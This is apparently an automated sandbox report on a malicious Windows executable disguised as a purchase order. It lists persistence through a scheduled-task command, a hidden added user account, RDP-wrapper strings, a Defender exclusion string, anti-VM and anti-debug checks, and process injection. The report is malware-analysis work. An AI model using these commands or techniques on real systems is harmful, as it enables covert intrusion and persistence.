Code function: 4_3_046994E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,

4_3_046994E0

Source: ADJUSTED PO3917NOV.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: ADJUSTED PO3917NOV.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: ADJUSTED PO3917NOV.exe, 00000004.00000002.556535159.0000000004470000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: ADJUSTED PO3917NOV.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: ADJUSTED PO3917NOV.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: ADJUSTED PO3917NOV.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: ADJUSTED PO3917NOV.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_004120B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_004120B8

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_01
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Mutant created: \Sessions\1\BaseNamedObjects\GjVhIQZsqPgi

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: ADJUSTED PO3917NOV.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: ADJUSTED PO3917NOV.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: ADJUSTED PO3917NOV.exe
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: ADJUSTED PO3917NOV.exe, 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: ADJUSTED PO3917NOV.exe, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: QUQovKcaZRcNZ.exe.0.dr, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.ADJUSTED PO3917NOV.exe.990000.0.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.ADJUSTED PO3917NOV.exe.990000.0.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.2.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.17.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.20.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.7.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.23.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.14.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.5.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.11.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.1.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.9.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.0.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ADJUSTED PO3917NOV.exe.f70000.3.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.ADJUSTED PO3917NOV.exe.f70000.2.unpack, cs276_bjt_11__2008_hashFunctions/Form_hashFunctions.cs	.Net Code: ParallelLoopResult System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 0_2_00994A25 push ss; ret	0_2_00994A29
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046F8D05 push ecx; ret	4_3_046F8D18
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_00401190 push eax; ret	4_2_004011A4
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_00401190 push eax; ret	4_2_004011CC
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_004144B1 push ebp; retf	4_2_00414564
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_00414550 push ebp; retf	4_2_00414564

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_3_046F981B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

4_3_046F981B

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0040D418 NetUserAdd,NetLocalGroupAddMembers,

4_2_0040D418

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

File created: C:\Users\user\AppData\Roaming\QUQovKcaZRcNZ.exe

Jump to dropped file

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_0040AC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,		4_2_0040AC0A
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_0040A6C8 GetBinaryTypeW,CopyFileW,CryptReleaseContext,PathFileExistsW,GetPrivateProfileStringW,		4_2_0040A6C8

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QUQovKcaZRcNZ" /XML "C:\Users\user\AppData\Local\Temp\tmpD7D5.tmp

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0040D508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

4_2_0040D508

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

File opened: C:\Users\user\Desktop\:Zone.Identifier read attributes | delete

Jump to behavior

Contains functionality to hide user accounts

Show sources

Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: ADJUSTED PO3917NOV.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ADJUSTED PO3917NOV.exe, 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.2f1db8c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ADJUSTED PO3917NOV.exe PID: 5404, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe TID: 5068	Thread sleep time: -32523s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe TID: 4068	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe TID: 4724	Thread sleep count: 60 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,

4_2_0040DA5B

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_3_046997E0 GetSystemTime followed by cmp: cmp edx, 04h and CTI: jc 0469983Bh

4_3_046997E0

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Thread delayed: delay time: 32523			Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0041002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

4_2_0041002B

Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_3_04699970 GetSystemInfo,

4_3_04699970

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_00409DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,

4_2_00409DF6

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

4_3_046F981B

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_0041094E mov eax, dword ptr fs:[00000030h]	4_2_0041094E
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_00419172 mov eax, dword ptr fs:[00000030h]	4_2_00419172
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_00410619 mov eax, dword ptr fs:[00000030h]	4_2_00410619
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_00410620 mov eax, dword ptr fs:[00000030h]	4_2_00410620

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_3_046F5FCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_3_046F5FCC

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_00401085 GetProcessHeap,RtlAllocateHeap,

4_2_00401085

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046F5FCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_3_046F5FCC
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046F723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_3_046F723B

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject threads in other processes

Show sources

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_004079E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,

4_2_004079E8

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe

4_2_004120B8

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QUQovKcaZRcNZ" /XML "C:\Users\user\AppData\Local\Temp\tmpD7D5.tmp			Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process created: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe			Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0040F56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,

4_2_0040F56D

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_004118BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,

4_2_004118BA

Source: ADJUSTED PO3917NOV.exe, 00000004.00000002.555576015.0000000001BD0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: ADJUSTED PO3917NOV.exe, 00000004.00000002.555576015.0000000001BD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ADJUSTED PO3917NOV.exe, 00000004.00000002.555576015.0000000001BD0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: ADJUSTED PO3917NOV.exe, 00000004.00000002.555576015.0000000001BD0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
